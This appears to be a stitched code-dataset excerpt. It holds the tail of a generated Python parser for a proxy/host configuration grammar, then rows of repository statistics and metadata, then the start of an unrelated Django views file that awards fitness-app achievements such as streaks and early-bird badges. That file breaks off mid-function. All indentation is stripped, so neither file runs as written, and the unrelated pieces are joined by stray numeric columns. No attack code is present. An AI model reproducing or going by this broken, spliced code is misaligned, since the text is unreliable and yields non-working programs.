if self._offset < self._input_size:
chunk4 = self._input[self._offset:self._offset + 1]
if chunk4 is not None and Grammar.REGEX_14.search(chunk4):
address8 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address8 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address8 is not FAILURE:
elements3.append(address8)
remaining2 -= 1
if remaining2 <= 0:
address7 = TreeNode(self._input[index4:self._offset], index4, elements3)
self._offset = self._offset
else:
address7 = FAILURE
if address7 is not FAILURE:
elements0.append(address7)
address9 = FAILURE
chunk5 = None
if self._offset < self._input_size:
chunk5 = self._input[self._offset:self._offset + 1]
if chunk5 == '.':
address9 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address9 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"."')
if address9 is not FAILURE:
elements0.append(address9)
address10 = FAILURE
remaining3, index5, elements4, address11 = 1, self._offset, [], True
while address11 is not FAILURE:
chunk6 = None
if self._offset < self._input_size:
chunk6 = self._input[self._offset:self._offset + 1]
if chunk6 is not None and Grammar.REGEX_15.search(chunk6):
address11 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address11 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\d]')
if address11 is not FAILURE:
elements4.append(address11)
remaining3 -= 1
if remaining3 <= 0:
address10 = TreeNode(self._input[index5:self._offset], index5, elements4)
self._offset = self._offset
else:
address10 = FAILURE
if address10 is not FAILURE:
elements0.append(address10)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['ipv4_host'][index0] = (address0, self._offset)
return address0
def _read_dns_host(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['dns_host'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_16.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-Z\\-\\.\\d]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['dns_host'][index0] = (address0, self._offset)
return address0
def _read_wildcard_host(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['wildcard_host'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 == '*':
address0 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address0 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('"*"')
self._cache['wildcard_host'][index0] = (address0, self._offset)
return address0
def _read_proxy_name(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['proxy_name'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_17.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[a-zA-Z0-9\\-\\_\\.:]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['proxy_name'][index0] = (address0, self._offset)
return address0
def _read_value(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['value'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_18.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[^#\\n]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['value'][index0] = (address0, self._offset)
return address0
def _read_char(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['char'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
index1, elements0 = self._offset, []
address1 = FAILURE
index2 = self._offset
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_19.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[\\n]')
self._offset = index2
if address1 is FAILURE:
address1 = TreeNode(self._input[self._offset:self._offset], self._offset)
self._offset = self._offset
else:
address1 = FAILURE
if address1 is not FAILURE:
elements0.append(address1)
address2 = FAILURE
if self._offset < self._input_size:
address2 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address2 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('<any char>')
if address2 is not FAILURE:
elements0.append(address2)
else:
elements0 = None
self._offset = index1
else:
elements0 = None
self._offset = index1
if elements0 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
self._cache['char'][index0] = (address0, self._offset)
return address0
def _read_whitespace(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['whitespace'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 0, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_20.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[ \\t]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['whitespace'][index0] = (address0, self._offset)
return address0
def _read_whitespaceplus(self):
address0, index0 = FAILURE, self._offset
cached = self._cache['whitespaceplus'].get(index0)
if cached:
self._offset = cached[1]
return cached[0]
remaining0, index1, elements0, address1 = 1, self._offset, [], True
while address1 is not FAILURE:
chunk0 = None
if self._offset < self._input_size:
chunk0 = self._input[self._offset:self._offset + 1]
if chunk0 is not None and Grammar.REGEX_21.search(chunk0):
address1 = TreeNode(self._input[self._offset:self._offset + 1], self._offset)
self._offset = self._offset + 1
else:
address1 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[ \\t]')
if address1 is not FAILURE:
elements0.append(address1)
remaining0 -= 1
if remaining0 <= 0:
address0 = TreeNode(self._input[index1:self._offset], index1, elements0)
self._offset = self._offset
else:
address0 = FAILURE
self._cache['whitespaceplus'][index0] = (address0, self._offset)
return address0
class Parser(Grammar):
def __init__(self, input, actions, types):
self._input = input
self._input_size = len(input)
self._actions = actions
self._types = types
self._offset = 0
self._cache = defaultdict(dict)
self._failure = 0
self._expected = []
def parse(self):
tree = self._read_configuration()
if tree is not FAILURE and self._offset == self._input_size:
return tree
if not self._expected:
self._failure = self._offset
self._expected.append('<EOF>')
raise ParseError(format_error(self._input, self._failure, self._expected))
def format_error(input, offset, expected):
lines, line_no, position = input.split('\n'), 0, 0
while position <= offset:
position += len(lines[line_no]) + 1
line_no += 1
message, line = 'Line ' + str(line_no) + ': expected ' + ', '.join(expected) + '\n', lines[line_no - 1]
message += line + '\n'
position -= len(line) + 1
message += ' ' * (offset - position)
return message + '^'
def parse(input, actions=None, types=None):
parser = Parser(input, actions, types)
return parser.parse()
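# Illustrative usage sketch (not part of the generated module): the module-level
# `parse` function above is the public entry point. The file name below is a
# placeholder, and `.text` on the result assumes the TreeNode class defined
# earlier in this file exposes the matched text, as Canopy-generated parsers
# normally do.
if __name__ == '__main__':
    with open('example.cfg') as fh:   # hypothetical input file
        source = fh.read()
    try:
        tree = parse(source)          # the actions/types hooks stay None here
        print(tree.text)              # full text matched by the parse
    except ParseError as exc:
        print(exc)                    # offending line plus a caret marker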
| 45.089974
| 126
| 0.464303
| 11,722
| 140,320
| 5.317608
| 0.018256
| 0.197648
| 0.119263
| 0.090482
| 0.921968
| 0.905171
| 0.890507
| 0.88085
| 0.835047
| 0.789325
| 0
| 0.041165
| 0.462628
| 140,320
| 3,111
| 127
| 45.104468
| 0.785489
| 0.000299
| 0
| 0.816694
| 0
| 0
| 0.014329
| 0.001839
| 0.000334
| 0
| 0
| 0
| 0
| 1
| 0.02571
| false
| 0.003673
| 0.000668
| 0
| 0.074457
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d89e10609fcdfb58feafb81fd98260efa8544c38
| 46,667
|
py
|
Python
|
BPBackendDjango/BPBackendDjango/Views/achievementviews.py
|
bp-momentum/BP-backend
|
f6b4b344c2c5fae3c8bb17874771aa49a48e97ef
|
[
"MIT"
] | 3
|
2022-03-15T09:56:31.000Z
|
2022-03-15T09:56:59.000Z
|
BPBackendDjango/BPBackendDjango/Views/achievementviews.py
|
bp-momentum/BP-backend
|
f6b4b344c2c5fae3c8bb17874771aa49a48e97ef
|
[
"MIT"
] | 38
|
2022-01-16T18:26:10.000Z
|
2022-03-14T23:14:40.000Z
|
BPBackendDjango/BPBackendDjango/Views/achievementviews.py
|
bp-momentum/BP-backend
|
f6b4b344c2c5fae3c8bb17874771aa49a48e97ef
|
[
"MIT"
] | null | null | null |
from urllib import request
from rest_framework.views import APIView
from rest_framework.response import Response
from ..Helperclasses.jwttoken import JwToken
from ..Helperclasses.handlers import AchievementHandler, ErrorHandler, LanguageHandler
from ..models import Achievement, DoneExercises, Friends, User, UserAchievedAchievement, UserMedalInExercise
from .exerciseviews import MAX_POINTS
#data for achievements (hours -> seconds of day; one hour is 3600 seconds)
NIGHT_START = 22*3600
NIGHT_END = 6*3600
EARLY_END = 8*3600
ROOT_PATH = 'https://cdn.geoscribble.de/achievements/'
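# Illustrative note (not part of the original module): DoneExercises.date is
# treated below as a Unix timestamp in seconds, so `date % 86400` yields the
# second of the (UTC) day. For example, an exercise finished at 23:30 UTC gives
# 23*3600 + 30*60 = 84600 > NIGHT_START (79200), so it counts for the night
# owl; one finished at 07:00 UTC gives 25200, which lies between NIGHT_END
# (21600) and EARLY_END (28800) and therefore counts for the early bird.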
class GetAchievementsView(APIView):
def get(self, request, *args, **kwargs):
#checking if it contains all arguments
check = ErrorHandler.check_arguments(['Session-Token'], request.headers, [], request.data)
if not check.get('valid'):
data = {
'success': False,
'description': 'Missing arguments',
'data': check.get('missing')
}
return Response(data)
token = JwToken.check_session_token(request.headers['Session-Token'])
#check if token is valid
if not token["valid"]:
data = {
'success': False,
'description': 'Token is not valid',
'data': {}
}
return Response(data)
info = token['info']
#only users can get their own achievements
if not User.objects.filter(username=info['username']).exists():
data = {
'success': False,
'description': 'Not a user',
'data': {}
}
return Response(data)
user:User = User.objects.get(username=info['username'])
achieved = []
nr_unachieved_hidden = 0
#create achievements that do not exist yet
if not Achievement.objects.filter(name='doneExercises').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'doneExercises_0.svg","1":"' + ROOT_PATH + 'doneExercises_1.svg","2":"' + ROOT_PATH + 'doneExercises_2.svg","3":"' + ROOT_PATH + 'doneExercises_3.svg"}'
Achievement.objects.create(name='doneExercises', title='{"en":"Done Exercises","de":"Abgeschlossene Übungen"}', description='{"en":"Do exercises to get/level this achievement","de":"Mache Übungen um diese Errungenschaft zu bekommen beziehungsweise hoch zu leveln"}', icon=icon_dict)
if not Achievement.objects.filter(name='havingFriends').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'friends_0.svg","1":"' + ROOT_PATH + 'friends_1.svg"}'
Achievement.objects.create(name='havingFriends', title='{"en":"A Friend!","de":"Freundschaft!"}', description='{"en":"Become friends with another user.","de":"Schließe eine Freundschaft mit einem/r anderen Spieler*in"}', icon=icon_dict)
if not Achievement.objects.filter(name='streak').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'streak_0.svg","1":"' + ROOT_PATH + 'streak_1.svg","2":"' + ROOT_PATH + 'streak_2.svg","3":"' + ROOT_PATH + 'streak_3.svg","4":"' + ROOT_PATH + 'streak_4.svg"}'
Achievement.objects.create(name='streak', title='{"en":"Streak","de":"Streak"}', description='{"en":"Reach a streak","de":"Erreiche eine Streak"}', icon=icon_dict)
if not Achievement.objects.filter(name='perfectExercise').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'perfectExercise_0.svg","1":"' + ROOT_PATH + 'perfectExercise_1.svg"}'
Achievement.objects.create(name='perfectExercise', title='{"en":"Perfect Exercise","de":"Perfekte Übung"}', description='{"en":"Complete an exercise with 100 percent","de":"Erreiche 100 Prozent bei einer Übung"}', icon=icon_dict)
if not Achievement.objects.filter(name='nightOwl').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'nightOwl_0.svg","1":"' + ROOT_PATH + 'nightOwl_1.svg"}'
Achievement.objects.create(name='nightOwl', title='{"en":"Night Owl","de":"Nachteule"}', description='{"en":"Do an exercise between 10 PM and 6 AM","de":"Mache eine Übung zwischen 10 Uhr abends und 6 Uhr morgens"}', hidden= True, icon=icon_dict)
if not Achievement.objects.filter(name='earlyBird').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'earlyBird_0.svg","1":"' + ROOT_PATH + 'earlyBird_1.svg"}'
Achievement.objects.create(name='earlyBird', title='{"en":"Early Bird","de":"Der frühe Vogel.."}', description='{"en":"Do an exercise early in the morning (between 6 AM and 8 AM)","de":"Mache eine Übung frühmorgens (zwischen 6 und 8 Uhr)"}', hidden=True, icon=icon_dict)
#iterate over all existing achievements
for achievement in Achievement.objects.all():
#done exercises
if achievement.name == 'doneExercises':
#get number of done exercises
nr_of_exs = len(DoneExercises.objects.filter(user=user.id))
#check which level is reached
if nr_of_exs >= 100:
res = AchievementHandler.upgrade_level(user, achievement, 3)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 3,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(3, achievement.icon)
})
elif nr_of_exs >= 50:
res = AchievementHandler.upgrade_level(user, achievement, 2)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 2,
'progress': str(nr_of_exs)+'/100',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(2, achievement.icon)
})
elif nr_of_exs >= 10:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': str(nr_of_exs)+'/50',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': str(nr_of_exs)+'/10',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#make a friend
elif achievement.name == 'havingFriends':
#get number of friends
nr_of_friends = len(Friends.objects.filter(friend1=user.id, accepted=True).union(Friends.objects.filter(friend2=user.id, accepted=True)))
#check which level is reached
if nr_of_friends >= 1:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': '0/1',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#streak
elif achievement.name == 'streak':
#get users streak
streak = user.streak
#check which level is reached
if streak >= 90:
res = AchievementHandler.upgrade_level(user, achievement, 4)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 4,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(4, achievement.icon)
})
elif streak >= 30:
res = AchievementHandler.upgrade_level(user, achievement, 3)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 3,
'progress': str(streak)+'/90',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(3, achievement.icon)
})
elif streak >= 7:
res = AchievementHandler.upgrade_level(user, achievement, 2)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 2,
'progress': str(streak)+'/30',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(2, achievement.icon)
})
elif streak >= 3:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': str(streak)+'/7',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': str(streak)+'/3',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#perfectExercise
elif achievement.name == 'perfectExercise':
found = False
#get all done exercises
all = DoneExercises.objects.filter(user=user)
#search for exercise with MAX_POINTS
for a in all:
if a.points == MAX_POINTS:
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': '0/1',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#night owl
elif achievement.name == 'nightOwl':
found = False
#get all done exercises
all = DoneExercises.objects.filter(user=user)
#check whether any exercise was done during the night
for a in all:
if ((a.date % 86400) > NIGHT_START) or ((a.date % 86400) < NIGHT_END):
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': '0/1',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
#earlyBird
elif achievement.name == 'earlyBird':
found = False
#get all exercises
all = DoneExercises.objects.filter(user=user)
#check whether any exercise was done early in the morning
for a in all:
if ((a.date % 86400) > NIGHT_END) and ((a.date % 86400) < EARLY_END):
found = True
break
#set achievement
if found:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
elif not achievement.hidden:
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 0,
'progress': '0/1',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(0, achievement.icon)
})
else:
nr_unachieved_hidden = nr_unachieved_hidden + 1
data = {
'success': True,
'description': 'Returning achievements',
'data': {
'achievements': achieved,
'nr_unachieved_hidden': nr_unachieved_hidden
}
}
return Response(data)
class ReloadFriendAchievementView(APIView):
def get(self, request, *args, **kwargs):
#checking if it contains all arguments
check = ErrorHandler.check_arguments(['Session-Token'], request.headers, [], request.data)
if not check.get('valid'):
data = {
'success': False,
'description': 'Missing arguments',
'data': check.get('missing')
}
return Response(data)
token = JwToken.check_session_token(request.headers['Session-Token'])
#check if token is valid
if not token["valid"]:
data = {
'success': False,
'description': 'Token is not valid',
'data': {}
}
return Response(data)
info = token['info']
#only users can get their own achievements
if not User.objects.filter(username=info['username']).exists():
data = {
'success': False,
'description': 'Not a user',
'data': {}
}
return Response(data)
user:User = User.objects.get(username=info['username'])
#create the achievement if it does not exist yet
if not Achievement.objects.filter(name='havingFriends').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'friends_0.svg","1":"' + ROOT_PATH + 'friends_1.svg"}'
Achievement.objects.create(name='havingFriends', title='{"en":"A Friend!","de":"Freundschaft!"}', description='{"en": "Become friends with another user.", "de": "Sei mit einem Spieler befreundet"}', icon=icon_dict)
achievement:Achievement = Achievement.objects.get(name='havingFriends')
#if already achieved earlier, there is nothing new to report
if UserAchievedAchievement.objects.filter(achievement=achievement, user=user).exists():
data = {
'success': True,
'description': 'Not achieved',
'data': {}
}
return Response(data)
#get number of friends
nr_of_friends = len(Friends.objects.filter(friend1=user.id, accepted=True).union(Friends.objects.filter(friend2=user.id, accepted=True)))
#check which level is reached
if nr_of_friends >= 1:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
data = {
'success': True,
'description': 'Achieved',
'data': {
'achievements': {
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
}
}
}
else:
data = {
'success': True,
'description': 'Not achieved',
'data': {}
}
return Response(data)
class ReloadAfterExerciseView(APIView):
def get(self, request, *args, **kwargs):
#checking if it contains all arguments
check = ErrorHandler.check_arguments(['Session-Token'], request.headers, [], request.data)
if not check.get('valid'):
data = {
'success': False,
'description': 'Missing arguments',
'data': check.get('missing')
}
return Response(data)
token = JwToken.check_session_token(request.headers['Session-Token'])
#check if token is valid
if not token["valid"]:
data = {
'success': False,
'description': 'Token is not valid',
'data': {}
}
return Response(data)
info = token['info']
#only users can get their own achievements
if not User.objects.filter(username=info['username']).exists():
data = {
'success': False,
'description': 'Not a user',
'data': {}
}
return Response(data)
user:User = User.objects.get(username=info['username'])
achieved = []
#done exercises
if not Achievement.objects.filter(name='doneExercises').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'doneExercises_0.svg","1":"' + ROOT_PATH + 'doneExercises_1.svg","2":"' + ROOT_PATH + 'doneExercises_2.svg","3":"' + ROOT_PATH + 'doneExercises_3.svg"}'
Achievement.objects.create(name='doneExercises', title='{"en":"Done Exercises","de":"Abgeschlossene Übungen"}', description='{"en": "Do exercises to get/level this achievement", "de": "Mache Übungen um diese Errungenschaft zu bekommen beziehungsweise hoch zu leveln"}', icon=icon_dict)
achievement:Achievement = Achievement.objects.get(name='doneExercises')
#get number of done exercises
nr_of_exs = len(DoneExercises.objects.filter(user=user.id))
#skip the checks if the highest level (3) was already achieved
if not UserAchievedAchievement.objects.filter(achievement=achievement, user=user, level=3).exists():
#check which level is reached
if nr_of_exs >= 100:
res = AchievementHandler.upgrade_level(user, achievement, 3)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 3,
'progress': 'done',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(3, achievement.icon)
})
elif nr_of_exs >= 50:
res = AchievementHandler.upgrade_level(user, achievement, 2)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'level upgraded':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 2,
'progress': str(nr_of_exs)+'/100',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(2, achievement.icon)
})
elif nr_of_exs >= 10:
res = AchievementHandler.achieve_achievement(user, achievement)
if not res[0]:
data = {
'success': False,
'description': 'assigning achievement failed',
'data': {
'error': res[1],
'achievement': achievement.name
}
}
return Response(data)
if res[1] == 'user achieved achievement':
achieved.append({
'name': achievement.name,
'title': LanguageHandler.get_in_correct_language(user.username, achievement.title),
'description': LanguageHandler.get_in_correct_language(user.username, achievement.description),
'level': 1,
'progress': str(nr_of_exs)+'/50',
'hidden': achievement.hidden,
'icon': AchievementHandler.get_icon(1, achievement.icon)
})
#perfectExercise
if not Achievement.objects.filter(name='perfectExercise').exists():
icon_dict = '{"0":"' + ROOT_PATH + 'perfectExercise_0.svg","1":"' + ROOT_PATH + 'perfectExercise_1.svg"}'
